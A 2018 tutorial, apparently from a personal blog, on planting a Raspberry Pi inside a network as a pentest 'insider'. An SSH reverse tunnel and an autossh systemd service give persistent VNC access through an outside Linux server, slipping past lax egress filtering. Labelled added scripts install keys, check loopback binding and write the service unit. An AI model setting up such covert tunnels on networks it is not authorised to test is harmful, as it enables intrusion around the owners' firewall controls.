Make Some Raspberry Hole Punch!

29 Jan 2018

In a penetration test or security audit of a network, a Raspberry Pi can be planted inside the network to act as an insider.
By using a third-party server across the internet, we can abuse the fact that most firewalls are configured to check ingress traffic strictly while being very lax on egress packets. By using an outbound connection we can ignore NAT and port forwarding by tunneling the traffic to a Linux server; this is often referred to as hole punching. OpenSSH allows us to do this with some scripting. A crude remote access tool can be created using a Raspberry Pi to conduct information gathering.

Required

We will be using Linux for this document. Some servers may not have port forwarding enabled for security reasons, as you
could spoof IP traffic that looks like it's originating from the SSH server.

On the note of security, I have written the SSH forward to bind to 'localhost' on our Linux host. This means your
data is not exposed to the internet. However, it is exposed to all users who can log in to the Linux server with a valid
account. If you are going to use this guide it is mandatory to change the default password, because other users can
find your port number and attempt to log in. This can be accomplished by running the following commands as pi:

We use an RSA key pair for SSH. It is important to note that at the end of this tutorial your Raspberry Pi will contain
a private key (id_rsa) that allows a login to your Linux server. If you lose your private key or believe it is
compromised, you must remove the matching public key from the authorized_keys file on your remote Linux server to prevent someone impersonating your account.

Setting up the Pi

We will utilize public key authentication to allow the Pi to log in to Linux without a password prompt. This method uses an RSA key pair in place of a password.

ssh-keygen # Run as pi
Enter file in which to save the key (/home/pi/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:

For the three prompts we will just hit enter (blank). If done successfully you will see:

So my home directory is /home/r/rosshiga. I'll copy my public key to /home/r/rosshiga/.ssh/pi.pub on the remote Linux server.
The easiest way to copy files is SSH, since both the server and the Pi have SSH.
The scp utility uses SSH to copy files from the Pi.

cat pi.pub >> authorized_keys can be broken down. cat "file" prints the contents of the file, and >> is a standard
redirection that appends to another file. So what the terminal is doing is reading out our public key and appending it to
the authorized list. If you are successful at this, future SSH sessions from the Pi to Linux will not require a password.
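The append step above, as an added example that is not part of the original post: a small POSIX shell function that does what cat pi.pub >> authorized_keys does, but refuses to add the same key twice and sets the permissions sshd expects (700 on ~/.ssh, 600 on authorized_keys; with the default StrictModes setting, sshd rejects key authentication when these files are group- or world-writable). The file names are the ones used in this guide; the key blob in the demo is constructed, not a real key.

```shell
#!/bin/sh
# Added example, not from the original post. Appends a public key to an
# authorized_keys file the way "cat pi.pub >> authorized_keys" does, but
# skips keys that are already present and fixes the permissions that sshd's
# StrictModes check expects. Paths are assumptions; pass your own.

install_authorized_key() {
    pubkey_file="$1"          # e.g. /home/r/rosshiga/.ssh/pi.pub
    ssh_dir="$2"              # e.g. /home/r/rosshiga/.ssh
    auth_file="$ssh_dir/authorized_keys"

    mkdir -p "$ssh_dir"
    touch "$auth_file"
    chmod 700 "$ssh_dir"      # sshd rejects keys in a group/world-writable dir
    chmod 600 "$auth_file"

    # A public key line is "<type> <base64 blob> [comment]". Compare on the
    # first two fields so the same key with a different comment still counts
    # as a duplicate.
    key_id=$(awk 'NR == 1 { print $1 " " $2 }' "$pubkey_file")
    if grep -qF -- "$key_id" "$auth_file"; then
        echo "already present: $key_id"
        return 0
    fi
    cat "$pubkey_file" >> "$auth_file"
    echo "appended: $key_id"
}

# Number of key lines currently authorized (ssh-rsa, ssh-ed25519, ...).
count_authorized_keys() {
    grep -c '^ssh-' "$1" || true
}

# Demo on a constructed key in a temporary directory (not a real key).
demo_dir=$(mktemp -d)
printf '%s\n' 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDconstructedDemoKeyBlob0123 pi@raspberrypi' \
    > "$demo_dir/pi.pub"
install_authorized_key "$demo_dir/pi.pub" "$demo_dir/.ssh"
install_authorized_key "$demo_dir/pi.pub" "$demo_dir/.ssh"   # second run is a no-op
echo "keys authorized: $(count_authorized_keys "$demo_dir/.ssh/authorized_keys")"
rm -rf "$demo_dir"
```

On the real server you would call it as install_authorized_key ~/.ssh/pi.pub ~/.ssh; running it twice leaves a single copy of the key, which matters when you later have to remove a compromised key and want to be sure only one line needs to go.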

Once we verify no password is required we can set up forwarding for our VNC port 5900 to Linux. First let's verify
that we can tunnel the VNC port to a test port 4444. (You should pick your own port number > 10000.)

ssh -v -R localhost:4444:localhost:5900 rosshiga@uhLinux.hawaii.edu

This command tells ssh to tunnel the (R)emote (UH Linux) port localhost:4444 to the local port localhost:5900. This in
effect maps our VNC port to a port on Linux. You will see many debug messages because of the -v option, but you are
looking for a forwarding success message.
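An added check, not from the original post, for the point made earlier that the forward binds to localhost: on the Linux server, ss -ltn lists listening TCP sockets, and the function below reads that output and reports whether the tunnel port is bound only to the loopback addresses. If the server's sshd_config has GatewayPorts yes, the same -R forward is bound to all interfaces instead, and the Pi's VNC port becomes reachable from the internet. The sample ss lines are constructed; the port number 4444 is the guide's.

```shell
#!/bin/sh
# Added example, not from the original post. Reads "ss -ltn" output on stdin
# and checks that every listener on the given port is bound to a loopback
# address. Exit status: 0 = loopback only, 1 = bound on a non-loopback
# address, 2 = nothing is listening on that port.
#
# Usage on the Linux server:   ss -ltn | loopback_only_listener 4444
loopback_only_listener() {
    awk -v port="$1" '
        $1 == "LISTEN" {
            # Field 4 is "addr:port"; the port is everything after the last
            # colon (IPv6 addresses contain colons, so split from the right).
            n = split($4, parts, ":")
            if (parts[n] != port) next
            addr = substr($4, 1, length($4) - length(parts[n]) - 1)
            found = 1
            if (addr != "127.0.0.1" && addr != "[::1]") exposed = 1
        }
        END {
            if (!found)  exit 2
            if (exposed) exit 1
            exit 0
        }'
}

# Turns the exit status into a one-line verdict for humans.
describe_tunnel_bind() {
    status=0
    loopback_only_listener "$1" || status=$?
    case "$status" in
        0) echo "port $1: loopback only (not reachable from outside)" ;;
        1) echo "port $1: EXPOSED on a non-loopback address" ;;
        *) echo "port $1: nothing listening" ;;
    esac
    return "$status"
}

# Constructed sample of "ss -ltn" output with the default GatewayPorts=no:
# the tunnel port 4444 is only on 127.0.0.1 and [::1].
SAMPLE_SAFE='State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      128    127.0.0.1:4444     0.0.0.0:*
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*
LISTEN 0      128    [::1]:4444         [::]:*'

# Constructed sample of what GatewayPorts=yes would produce instead.
SAMPLE_EXPOSED='State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      128    0.0.0.0:4444       0.0.0.0:*
LISTEN 0      128    [::]:4444          [::]:*'

printf '%s\n' "$SAMPLE_SAFE"    | describe_tunnel_bind 4444 || true
printf '%s\n' "$SAMPLE_EXPOSED" | describe_tunnel_bind 4444 || true
```

Run the check once after the ssh -v test succeeds and again after the autossh service is up; a wildcard bind (0.0.0.0 or [::]) on the tunnel port means the server administrator has enabled GatewayPorts and the "not exposed to the internet" assumption of this guide no longer holds.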

Once that is saved, test the service with sudo systemctl start autossh. If it is reported as running by sudo systemctl status autossh, then enable the autossh service on boot by issuing sudo systemctl enable autossh.
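The guide's own autossh unit file is not reproduced above, so as an added example (not the author's file) here is a shell function that writes one equivalent to the -R forward used in this guide. It assumes autossh is installed at /usr/bin/autossh, that the Pi's key lives at /home/pi/.ssh/id_rsa, and that the unit is installed as /etc/systemd/system/autossh.service; the destination path is a parameter so the demo can write to a temporary directory instead. -M 0 turns off autossh's own monitoring port in favour of OpenSSH's ServerAlive keepalives, and ExitOnForwardFailure=yes makes ssh exit (so systemd restarts it) when the remote port cannot be bound, for example because a stale session still holds it.

```shell
#!/bin/sh
# Added example, not the guide's own unit file. Generates a systemd service
# that keeps the reverse tunnel from this guide up with autossh.
# Assumptions: autossh is at /usr/bin/autossh, the Pi user is "pi" with its
# key in /home/pi/.ssh/id_rsa, and the unit will be installed as
# /etc/systemd/system/autossh.service (the path is a parameter here so the
# demo below can write to a temp directory instead).

# Builds the ExecStart command line. -M 0 disables autossh's echo port and
# relies on ssh's ServerAlive keepalives to notice a dead link; -N opens no
# shell; ExitOnForwardFailure makes ssh exit (so systemd restarts it) when the
# remote port cannot be bound; StrictHostKeyChecking=yes requires the server's
# host key to already be in known_hosts from the earlier interactive test.
autossh_command() {
    remote_user="$1"; remote_host="$2"; remote_port="$3"; local_port="$4"
    printf '%s' "/usr/bin/autossh -M 0 -N -q" \
        " -o ServerAliveInterval=30 -o ServerAliveCountMax=3" \
        " -o ExitOnForwardFailure=yes -o StrictHostKeyChecking=yes" \
        " -i /home/pi/.ssh/id_rsa" \
        " -R localhost:${remote_port}:localhost:${local_port}" \
        " ${remote_user}@${remote_host}"
}

# Writes the unit to $1; the remaining arguments are passed to autossh_command.
write_autossh_unit() {
    dest="$1"; shift
    cat > "$dest" <<EOF
[Unit]
Description=Reverse SSH tunnel to $2 via autossh
After=network-online.target
Wants=network-online.target

[Service]
User=pi
# Gatetime 0: do not give up if the very first attempt at boot fails.
Environment=AUTOSSH_GATETIME=0
ExecStart=$(autossh_command "$@")
Restart=always
RestartSec=10

[Install]
WantedBy=multi-user.target
EOF
}

# Demo: write the unit for the guide's example host and ports to a temp dir.
demo=$(mktemp -d)
write_autossh_unit "$demo/autossh.service" rosshiga uhLinux.hawaii.edu 4444 5900
cat "$demo/autossh.service"
rm -rf "$demo"
```

To install it for real, run the writer with /etc/systemd/system/autossh.service as the destination (as root), then sudo systemctl daemon-reload, and continue with the start, status and enable commands given above.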

Using the tunnel

All the setup is done and you will no longer need to make any changes on the Pi or Linux. We just need to utilize the
tunnel. Our tunnel port in this example is 4444. We will use two methods to connect to the Pi.

OpenSSH (Windows (beta)/OS X/Linux)

Issue this command on your local machine:

ssh -v -L localhost:5900:localhost:4444 rosshiga@uhLinux.hawaii.edu

This tells SSH to do a (L)ocal forward from your machine's port 5900 to the remote machine's localhost:4444.
In our case it's binding to your port 5900 and forwarding it to port 4444 on Linux, but 4444 on Linux is 5900 on our Pi, thus completing the tunnel.

PuTTY

Use this image as a reference for your PuTTY configuration:

Connecting VNC

You will be able to connect to the Pi using the address localhost:5900 as long as both tunnels (Pi-Linux and Linux-Local)
are connected. See below